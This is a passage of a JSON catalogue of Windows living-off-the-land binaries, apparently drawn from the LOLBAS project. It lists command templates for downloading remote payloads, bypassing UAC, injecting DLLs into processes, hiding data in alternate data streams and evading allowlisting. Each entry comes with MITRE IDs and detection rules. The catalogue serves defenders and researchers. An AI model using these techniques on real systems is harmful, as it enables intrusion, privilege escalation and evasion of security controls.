{REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:iscsicpl-exe:0","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"c:\\windows\\syswow64\\iscsicpl.exe","description":"c:\\windows\\syswow64\\iscsicpl.exe has a DLL injection through `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll`, resulting in UAC bypass.","usecase":"Execute a custom DLL via a trusted high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"]},{"id":"lolbas:iscsicpl-exe:1","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"iscsicpl.exe","description":"Both `c:\\windows\\system32\\iscsicpl.exe` and `c:\\windows\\system64\\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"]},{"id":"lolbas:jsc-exe:0","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"]},{"id":"lolbas:jsc-exe:1","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe /t:library {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"]},{"id":"lolbas:ldifde-exe:0","toolId":"lolbas:ldifde-exe","toolName":"Ldifde.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Ldifde -i -f {PATH:.ldf}","description":"Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"admin","fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml"}],"references":["https://twitter.com/0gtweet/status/1564968845726580736","https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"]},{"id":"lolbas:makecab-exe:0","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:1","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:2","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compresses the target file and stores it in the target file.","usecase":"Download file and compress into a cab file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:makecab-exe:3","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"makecab /F {PATH:.ddf}","description":"Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"]},{"id":"lolbas:mavinject-exe:0","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}","description":"Inject evil.dll into a process with PID 3110.","usecase":"Inject dll file into running process","mitre":["T1218.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"]},{"id":"lolbas:mavinject-exe:1","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll","description":"Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172","usecase":"Inject dll file into running process","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:0","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:1","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:microsoft-workflow-compiler-exe:2","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"]},{"id":"lolbas:mmc-exe:0","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Launch a 'backgrounded' MMC process and invoke a COM payload","usecase":"Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mmc-exe:1","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"mmc.exe gpedit.msc","description":"Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.","usecase":"Modify HKCU\\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.","mitre":["T1218.014"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mmc-exe:2","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Download and save an executable to disk","usecase":"Download file from Internet","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"]},{"id":"lolbas:mofcomp-exe:0","toolId":"lolbas:mofcomp-exe","toolName":"Mofcomp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mofcomp.exe {PATH_ABSOLUTE:.mof}","description":"Abuse of mofcomp.exe to parse a file which contains MOF statements in order create new classes as part of the WMI repository","usecase":"Threat actors can use mofcomp.exe to register a malicious MOF file as a new class in the WMI repository","mitre":["T1047"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"strange parent processes spawning mofcomp.exe like cmd.exe or powershell.exe"},{"type":"Sigma","value":"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml"}],"references":["https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp","https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-","https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/","https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/","https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96","https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"]},{"id":"lolbas:mpcmdrun-exe:0","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}","description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows 